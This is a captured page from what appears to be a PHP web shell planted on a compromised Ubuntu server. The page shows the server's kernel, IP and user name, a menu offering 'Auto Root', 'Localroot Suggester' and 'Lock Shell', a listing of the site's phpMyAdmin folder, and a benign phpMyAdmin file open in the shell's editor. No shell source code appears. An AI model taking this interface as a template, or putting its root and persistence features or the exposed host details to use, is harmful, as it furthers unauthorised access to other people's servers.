Linux cloudpanel2ubuntu2204221onubuntu2204-s-1vcpu-2gb-intel-fra1-01 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64
nginx/1.21.4
Server IP : 127.0.0.1 & Your IP : 216.73.216.108
Domains :
Cant Read [ /etc/named.conf ]
User : turim3t
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
home /
turim3t /
htdocs /
turimet.com /
pma /
Delete
Unzip
Name
Size
Permission
Date
Action
doc
[ DIR ]
drwxr-xr-x
2025-01-20 22:15
examples
[ DIR ]
drwxr-xr-x
2025-01-20 22:15
js
[ DIR ]
drwxr-xr-x
2025-01-20 22:15
libraries
[ DIR ]
drwxr-xr-x
2025-01-20 22:15
locale
[ DIR ]
drwxr-xr-x
2025-01-20 22:15
setup
[ DIR ]
drwxr-xr-x
2025-01-20 22:15
sql
[ DIR ]
drwxr-xr-x
2025-01-20 22:15
templates
[ DIR ]
drwxr-xr-x
2025-01-20 22:15
themes
[ DIR ]
drwxr-xr-x
2025-01-20 22:15
tmp
[ DIR ]
drwxr-xr-x
2025-05-23 16:13
vendor
[ DIR ]
drwxr-xr-x
2025-01-20 22:15
CONTRIBUTING.md
2.53
KB
-rw-r--r--
2025-01-20 22:15
ChangeLog
19.04
KB
-rw-r--r--
2025-01-20 22:15
LICENSE
17.67
KB
-rw-r--r--
2025-01-20 22:15
README
1.48
KB
-rw-r--r--
2025-01-20 22:15
RELEASE-DATE-5.2.2
29
B
-rw-r--r--
2025-01-20 22:15
babel.config.json
69
B
-rw-r--r--
2025-01-20 22:15
composer.json
5.33
KB
-rw-r--r--
2025-01-20 22:15
composer.lock
320.62
KB
-rw-r--r--
2025-01-20 22:15
config.inc.php
4.86
KB
-rw-r--r--
2025-05-23 16:10
config.sample.inc.php
4.7
KB
-rw-r--r--
2025-01-20 22:15
favicon.ico
21.96
KB
-rw-r--r--
2025-01-20 22:15
index.php
1.05
KB
-rw-r--r--
2025-01-20 22:15
package.json
2.89
KB
-rw-r--r--
2025-01-20 22:15
robots.txt
26
B
-rw-r--r--
2025-01-20 22:15
show_config_errors.php
1.13
KB
-rw-r--r--
2025-01-20 22:15
url.php
965
B
-rw-r--r--
2025-01-20 22:15
yarn.lock
245.17
KB
-rw-r--r--
2025-01-20 22:15
Save
Rename
<?php /** * Simple wrapper just to enable error reporting and include config */ declare(strict_types=1); if (! defined('ROOT_PATH')) { // phpcs:disable PSR1.Files.SideEffects define('ROOT_PATH', __DIR__ . DIRECTORY_SEPARATOR); // phpcs:enable } // rfc2616 - Section 14.21 header('Expires: ' . gmdate(DATE_RFC1123)); // HTTP/1.1 header('Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0'); header('Pragma: no-cache'); // HTTP/1.0 // test case: exporting a database into a .gz file with Safari // would produce files not having the current time // (added this header for Safari but should not harm other browsers) header('Last-Modified: ' . gmdate(DATE_RFC1123)); header('Content-Type: text/html; charset=utf-8'); // phpcs:disable PSR1.Files.SideEffects define('PHPMYADMIN', true); // phpcs:enable require ROOT_PATH . 'libraries/constants.php'; // issue #16256 - This only works with php 8.0+ if (function_exists('error_reporting')) { error_reporting(E_ALL); } /** * Read config file. */ if (is_readable(CONFIG_FILE)) { /** @psalm-suppress MissingFile */ include CONFIG_FILE; }